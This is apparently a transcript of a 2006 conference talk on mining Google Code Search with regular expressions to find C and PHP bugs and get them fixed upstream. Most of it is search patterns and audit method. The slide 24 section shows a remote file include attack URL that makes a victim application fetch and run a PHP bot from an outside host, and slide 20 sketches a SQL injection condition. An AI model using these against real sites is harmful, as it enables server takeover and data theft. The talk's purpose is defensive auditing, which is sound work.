hola a todos, buenas y gracias. hello everyone, i hope all of you are having a good day, and thank you for coming. my name is jose nazario and i'll be talking about google codesearch. the talk will be in English, and i'll take questions and your comments in #qc. you can find the slides on my website at http://monkey.org/~jose/presentations/umeet06/slides/ ... [slide 1] today's talk is intended to introduce you to google codesearch and ways that you can use it to find all sorts of programming bugs in dozens of software applications at once. i'll provide you with a one or two slide introduction to google codesearch. also, since i promised google tricks (plural), i'll give you guys one more that i don't see used often: the dot operator. i found this accidentally when i was looking for an RPM package once. i found that "package.rpm" brought up "package, rpm" also. turns out that google seems to drop punctuation from the index and from your search terms, and replaces it with the generic "stuff we don't index" filler. so, you can now join your words in a phrase with the dot and match all sorts of combinations. compare searching for "foo bar" against "foo.bar" (with the first still quoted). the quotes enforce a space, but the dot allows you to have commas or other non-word stuff in there. kind of neat, and like i said, i don't see people using this often. [slide 2] a bit about me: i am a senior security and software engineer at arbor networks in ann arbor, michigan (USA). that basically means i write software, develop new products and features, and analyze security incidents, vulnerabilities, and tools all in my job. i am not employed by google and i do not represent them. keep this in mind when you're watching this talk. this is not an official google talk. the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ [slide 3] ok, google codesearch. 
as i recall it was launched by google's "labs" division (where new products come from) in early October 2006, so just a couple of months ago. codesearch is different from google's normal search in that it focuses on searching source code on the web. this includes C, PHP, C++, Java, and of course scripting languages like python, ruby, and perl. like google, it supports search operators, which let you control the search inputs. unlike google's basic search, however, it supports regular expressions. this means we can really dig into code flexibly. before, if you wanted to search on google for some source code you had to use the terms and "lang:c" in your input. now, google codesearch lets you apply patterns to find things more flexibly. in a nutshell, google's indexed millions of source code files. they've downloaded it so you don't have to! great if you have ever been curious about searching for bugs in code, like we'll be doing. far easier than downloading thousands of source packages, storing them, and grepping through them. google codesearch isn't the first code search engine. koders.com has been around for a while and they have a neat engine. it doesn't appear to support regular expressions, but it does have many other neat features. i recently used koders.com to find some BSD licensed code to include in a tool that i ported from BSD to Linux. these search engines are great for that sort of thing. [slide 4] ok, it's a beta of a google product so it'll have some bugs, that's to be expected. it tends to forget that you want a case sensitive search once you crawl past the first page, for example. also, its regular expression engine only applies the pattern to a single line at a time, so you can't make use of back references (a powerful regex facility that lets you build up complex queries on the fly). also, google codesearch doesn't always know what the newest source archive is, so sometimes you'll find a great bug and it will have been fixed in a newer version. 
all in all, though, not a bad tool to have at your disposal, as you'll see. the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ [slide 5] OK, so basics about regular expressions in case you haven't seen or used them before. regexes are basically a way of expressing text patterns to match specific characters or ranges of characters. for example, to match any character you can use the . character; * means 0 or more of the preceding character, and + means one or more of the preceding character. these can be mixed and matched, of course, such as .+ to mean one or more characters of any kind. to specify a range, use [x-y] to denote a range of characters, such as [A-Za-z] to match all alphabetical characters. if you want to negate something, use [^x]. sadly, a negated class only ever matches a single character at a time, so you can't use it to exclude a whole word (something like [^a-z] just means "one character that isn't a lowercase letter"). :-/ you have to escape characters that have special meaning, like (, ) and . using the backslash: \. to match a ., or \( to match a (. see the URL in the page to learn more about regex formats. they're not that hard to learn, but very complex ones require some practice. because they're used in so many things in UN*X-land, you should become familiar with them. [slide 6] just like normal google searches, you can use special operators to restrict your search. you can focus on the C language, for example, using "lang:c" in your search. you can also negate these, or chain them together: foobar lang:(c|c++) -lang:php you can also restrict by license, using the license: operator. ie to get only GPL files, use license:gpl. google codesearch infers the license from various files in the source repository. you can, of course, restrict by filename or by package, using the operators file: and package:. this basically applies these arguments to the result set. for example, to match only C header files, use file:\.h$ (anything ending in .h). 
you may want to focus on a particular package, such as only a certain website or file format, using the package operator. this one is a lot like "inurl" in a standard google query. we'll be using some of these operators in our searches to keep our results focused. [slide 7] the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ a couple of facts about google codesearch, one known and one not so well known. first, if your result set has more than one hit, you can use "n" to browse to the next result (kind of like "n" in a vi search). very handy! google codesearch highlights the results for you, also very nice. secondly, google codesearch seems to include some non-software archives in its index. i found this by accident while searching for my name! basically, what i found was someone's Linux home directory backup. because their mozilla cache held some example code that i wrote and had put on a website, google marked the backup as a code archive to include. voila, i found their backup. quite interesting, to say the least. i'm sure other interesting backups are out there, too. [slide 8] screen shot showing my results that found a backup in google codesearch. this is a backup of someone's home directory. my name appeared in their mozilla cache. [slide 9] in a nutshell, this is our strategy for finding bugs. it's based on the basic openbsd philosophy: find a bug, fix it, generalize the form, find it everywhere, fix it everywhere. for example, when you find a typo, it's usually not the only one of its kind. fix it, find the others, and fix them. what we're going to do here is to identify a bug or some bad programming practice, and generalize that form into a regular expression. we'll then apply that regular expression to google codesearch and then examine the results. i've found that with a well formed regular expression, about 10% or more of the search results are real bugs. 
what you should do when you apply this is to ensure that the bug still exists in the latest version of the code. i often have to visit the project website, look for the latest released version and possibly the source repository (SVN or CVS) and see if it's still there. if it is, i then generate a patch and file a bug. i did this in October for a variety of projects, including OpenAFS, MPlayer, MySQL, and many others. i got a bunch of bugs fixed over a single cup of coffee, that's how easy this can be. [slide 10] the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ i'll show you four basic bugs here and how we find them in google codesearch. you'll learn the regular expressions for some common C logic bugs (at least two of which have real security bug implications), some C string handling bugs, and two types of common PHP bugs: SQL injection and file include bugs. [slide 11] the first set of bugs we'll find in google codesearch are some logic bugs. specifically, there's a logic bug in C that people encounter when they make the typo of "&" vs "&&". & is a bitwise AND, and && is a logical AND. you use "&" to test for the presence of a bit in a variable, and "&&" to test that two conditions are both true (a logical AND). very often you'll see people building up a set of flags in an integer, mixing the flags together in a variable "flags". they'll then use bitwise ANDs to look for specific flags being set, such as FLAG_PROCESS or FLAG_OLD_INPUT. the test is if (flags & FLAG_MINE) { /* do some stuff */ } the complement of that is to look for two things being true, such as this: if (is_set && process) { /* do more stuff */ } only if "is_set" and "process" are both not 0 or not NULL will that be true. a common typo is to write && when & was meant. the same kind of typo shows up in the bitwise vs logical OR ("|" vs "||") and in the comparison vs assignment operators ("==" vs "="). 
[slide 12] ok, this is what we'll search for: flags\ *&&\ *[A-Za-z_]* this will look for a line where someone has "flags" (a common variable name) and a logical AND with an identifier (usually an upper case macro name). this is a common typo in C code. what's funny is that the compiler treats this as reasonable code, so you won't get a warning for it! however, if "flags" is not 0 or NULL and the macro is defined as not 0 or NULL, this condition will always be true. this is bad, obviously, and not what the programmer intended. so, let's search google codesearch for this ... [slide 13] here is an example bug in neon, found and fixed by one of our interns. the blue highlight marks the matched line, and we can infer what the programmer meant by reading the code. what they meant to do was to see if the session protocol flags have the AUTH_FLAG_VERIFY_NON40x bit set, but in this case that part of the test will always evaluate to true. if the other parts of the condition are true, then we'll see a mistaken "verify" part get hit. neon fixed this bug after jon (our intern) filed a report. this bug prevents the neon DAV component from evaluating the session properly. it doesn't turn up often, but it is a real bug. a coworker, aaron campbell, found a doozy of a bug in openssl certificate checking this way. he filed a bug report and got it fixed in under an hour. i found several bugs in MySQL, MPlayer, OpenAFS and other projects like this, and even wound up finding a security bug in OS X using this expression. [slide 14] let's look for an old school C bug. this was common about 10 years ago and has been whittled away quickly, but you'll still find it from time to time. basically what we'll be looking for is the programmer copying user-supplied input into a buffer without any sanity or length checking. in this case, we'll look for someone using strcat() (string concatenation or joining) from a user supplied argument (argv[x]). 
this is possibly a reliability bug, and even a security bug in some cases. this isn't so common anymore, because it's so easy to find, yet people still do it. [slide 15] so, this is what we'll search for: strcat\ *\(\ *.*\ *,\ *argv lang:c this looks for strcat followed by 0 or more spaces, then an open parenthesis, then any characters, then a comma, and then argv (with optional spaces, "\ *", in there). oh, and we'll restrict ourselves to the C language. the problem here is that the destination buffer may not be large enough to hold the user-supplied input. in fact, strcat() and strcpy() don't do any length checking, they happily shove all the data from the source into the dest and if it overflows, so be it. that means the user can craft the input and commit a basic buffer overflow. [slide 16] ok, it's 2006, and not surprisingly these are uncommon now. thankfully, too! this is a bug i found while searching for this: we can see that the buffer "command" gets built as a 10240 byte (10k) buffer, and for every argument supplied, the command is grown by the next argument and a space. we may be able to overflow this, i'm not sure the shell would allow it, but you get the idea. here we have two idioms mixed that are dangerous: a user-controlled loop (argc controls how many times it executes) and user supplied input going into a static buffer unchecked (strcat() from argv). bad code, and revealed by google codesearch. [slide 17] the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ here are some other basic C bugs you can look for. you can generalize the argc controlled loop pretty easily by looking for while loops and for loops including argc. other bug classes you can easily look for are format string bugs, looking for unformatted arguments to common functions like printf(), syslog() and the like. you can also look for overflows in the sprintf() and related functions. again, look for a user-controlled input. 
here, because google codesearch isn't allowing for backrefs, you have to weed these out manually. it's pretty tough to do, and these sorts of bugs are not very common anymore, either. with backrefs, we could easily "taint" user supplied variable data and follow it through the code. [slide 18] so, let's move on to the first of two sets of PHP bug classes. the first is SQL injection attacks and vulnerabilities. SQL injection bugs are very common and easily created. basically, they come from scenarios where developers build up SQL commands using unescaped, unscrubbed user-supplied input. there's a link here to show you how to exploit SQL injection bugs. i won't get into that here, but suffice it to say it's trivial. [slide 19] so, this is what we'll search for: SELECT\ *[^%]\ *$_GET lang:php this looks for SELECT being followed by a GET parameter reference without any formatting going on. there's no escaping in many of these cases, as well. the results? about 2000 hits on google codesearch. now that's a lot of bugs! [slide 20] here's an example, and (so it would fit on the screen) this one isn't all that high profile. (some of the other projects that had this are blogging software, CMS software, etc, all sorts of web apps). here the query string is built from a raw, unprocessed user-supplied variable: $query = "SELECT * FROM item WHERE ID == '" . $_GET['id'] ."'"; "query" references "id" from the user without any stripping of special SQL characters. there's nothing stopping you from closing that query and creating a new one (ie to call out stored procedures to get shell access), or modifying it to show all items (ie where id = 1 OR id > 0). this is the basic form of an SQL injection bug, and easy to avoid. lots of PHP books show you how to avoid this, yet it is sadly too common in PHP code. 
[slide 21] while i showed you SELECT for a GET parameter, you will also want to look for other SQL commands: INSERT, UPDATE, DELETE, and you'll also want to look for this in POST variables, too (ie $_POST['id']). when you expand this out, lots more bugs, all very similar, appear. :) the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ [slide 22] the second type of PHP bug class here is due to remote file includes. PHP has the "include()" directive which lets you include a local file. however, PHP also lets you include remote files from another web server. here the exploit is to grab a malicious PHP file off of a website you control. the exploit then sets the variable passed to include() to a URL. i recently found a bot that can be used in these attacks, called "pBot". it is designed to be included in PHP remote file include attacks and works quite well. [slide 23] so, what should you search for? just like before, look for the function using an unscrubbed argument: include\ *\(\ *\$_GET lang:php this looks for the PHP include function with an argument from the GET parameter, and only in PHP files. very straightforward: here the attacker can control the input directly. [slide 24] some real results found in google codesearch: include calls out to "page", a user supplied variable, and appends .php. what's the attack look like? suppose i have a malicious website and a malicious PHP file, like pBot :). i store it as http://monkey.org/~jose/php/pBot.php so, i attack an installation of this software like this: http://victim.com/admin.php?file=http://monkey.org/~jose/php/pBot the application, and the web server, will now include and run my PHP code. voila, a simple attack, and we found this in google codesearch. [slide 25] i showed you how to use the GET variable, and you should also look for PHP using untrustworthy input from cookies, POST variables, and anything else the user can supply, such as hostnames. 
also, you can find cross site scripting bugs this way, too, again by looking for user-supplied input being used without any treatment. the PHP docs have excellent discussions on secure programming idioms, by the way, so if you code in PHP, make sure you follow those! [slide 26] ok, so i showed you four basic bug classes and how to find them in google codesearch. there are some obvious limits to using google codesearch for your code audits. first, you still have to read the code. you still have to follow the logic and see if it's a real bug, and you still have to understand the code and any implications it has. you still have to make sure it's the latest version of the code before you fire off a bug report. you have to tune your regular expressions to keep the false positives down. compare searches for "strcat" vs strcat\ *\(\ *.*\ *,\ *argv. the former will find lots of basic libc definitions of strcat, the latter will find real uses of it. google codesearch is basically grep on steroids (in terms of speed and quantity of input, but it is missing backrefs), and it will only find single line bugs. you won't find many of the truly clever bugs this way. however, i found at least two security bugs like this in just one morning, over one cup of coffee: one in OS X (CVE-2006-4410) and one in another project i won't name here because the bug (and security hole) is still active. coworkers aaron and jon found two more security bugs in a matter of minutes. [slide 27] to sum it up, google codesearch is pretty nifty, and a lot easier than trying to download all sorts of code and screening it locally. believe me, i've done that! however, it doesn't support the google web service API yet, and it doesn't appear to be included in any IDE tools yet (like Koders is). i imagine this will happen in time. [slide 28] some more links for you to read. the first is from a coworker, aaron, and he gives some searches you can look at and explains how they work, and the bugs they yield. 
a great post! aaron's an awesome hacker and a great coworker at arbor. the next two are posts by me discussing codesearch and giving some basic insecurity statistics using it. the fourth is a post from the securiteam blog giving more searches and their results. lots more fun lurking in google codesearch, that's for sure. [slide 29] finally, again, this was all started by a morning IRC conversation with my arbor colleague aaron campbell. we wasted a good morning futzing around, finding bugs, and aaron found a nifty openssl 0.9.8 bug in a matter of minutes. make sure you read his blog posting. thank you all for your time and attention, i hope you have found this to be fun and interesting.